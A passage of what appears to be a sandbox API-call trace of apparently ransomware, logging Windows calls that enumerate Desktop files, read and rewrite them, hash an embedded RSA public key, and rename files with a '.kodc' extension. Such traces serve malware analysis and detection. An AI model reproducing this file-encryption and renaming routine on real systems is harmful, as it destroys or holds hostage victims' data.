Size=0xc) returned 0x9bb7de8 [0100.734] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e30 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e00 [0100.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0100.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e00 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e30 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5980 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.738] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0x15e71, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0x15e71, lpOverlapped=0x0) returned 1 [0100.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.739] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15e76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.739] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.740] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.740] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.740] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.740] CloseHandle (hObject=0x5cc) returned 1 [0100.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0100.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x32d0db8 [0100.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c9230 | out: hHeap=0x630000) returned 1 [0100.742] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\2TaJ89Ee8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\2taj89ee8.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\2TaJ89Ee8.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\2taj89ee8.bmp.kodc")) returned 1 [0100.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.743] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0100.745] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e1d90e0, ftCreationTime.dwHighDateTime=0x1d5b87c, ftLastAccessTime.dwLowDateTime=0x83bf42a0, ftLastAccessTime.dwHighDateTime=0x1d5c399, ftLastWriteTime.dwLowDateTime=0x83bf42a0, ftLastWriteTime.dwHighDateTime=0x1d5c399, nFileSizeHigh=0x0, nFileSizeLow=0xe264, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="553Q_Gxbe.docx", cAlternateFileName="553Q_G~1.DOC")) returned 1 [0100.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x32f3058 [0100.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.745] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\553Q_Gxbe.docx") returned=".docx" [0100.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\553Q_Gxbe.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\553q_gxbe.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.745] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=57956) returned 1 [0100.745] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.749] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe23e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.750] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.751] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.751] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe264, lpOverlapped=0x0) returned 1 [0100.752] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.752] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.752] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.752] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.752] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.753] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.753] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.753] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.753] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.753] GetLastError () returned 0x0 [0100.753] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.753] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.754] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.754] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.754] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.754] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.754] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe260) returned 0x9bb8968 [0100.754] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.755] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5980 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7dd0 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb59c8 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7de8 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e30 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.755] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.755] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e30 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e30 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7e18 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.756] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e30 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e18 | out: hHeap=0x630000) returned 1 [0100.756] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.757] GetCurrentThreadId () returned 0x42c [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7468 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.757] GetCurrentThreadId () returned 0x42c [0100.757] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.757] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.758] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.758] RtlAllocateHeap (HeapHandle=0x630000, 